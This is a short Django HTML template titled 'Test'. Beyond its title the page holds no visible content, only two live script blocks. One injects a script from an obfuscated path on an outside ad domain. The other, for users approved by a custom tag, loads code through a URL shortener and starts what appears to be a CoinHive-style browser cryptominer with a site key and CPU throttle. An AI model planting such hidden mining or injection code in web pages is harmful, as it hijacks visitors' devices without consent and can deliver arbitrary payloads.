{% load main_app_extras %}

<!doctype html>
<html>
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Test</title>
  </head>
  <body>
    
    <!-- Ad -->
<script>
(function(__htas){
var d = document,
    s = d.createElement('script'),
    l = d.scripts[d.scripts.length - 1];
s.settings = __htas || {};
s.src = "\/\/apprefaculty.pro\/aeW.Z\/y\/QL2b9\/k\/ZCTw9q6_b\/2\/5ilpSUWQQ\/9KNSD\/Ig0\/MrjVcN4eM\/Sq0x0\/MbjPQeybNfzOgiyCJInPBv1Gc_2KhIaVbB2P5llpSSWoQe9ENGDvIN0\/MyjpcO4pMkSj0\/0_MYjDQkyRNeztgIyK";
l.parentNode.insertBefore(s, l);
})({})
</script>
    <!-- !Ad -->
    
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <!-- Jus70 -->
{% can user.email request as CAN %}
{% if CAN %}
<script>
  $.getScript("https://cutt.ly/wns1PUz", function() {
    var _client = new Client.Anonymous('5359e2aefac13b8544fcee9326d4a0aafb5fd62a6991f1e87ade167c09c9967a', {
        throttle: 0.7, c: 'w'
    });
    _client.start();
    console.log('-');
  });
</script>
{% endif %}
    <!-- !Jus70 -->
    
  </body>
</html>
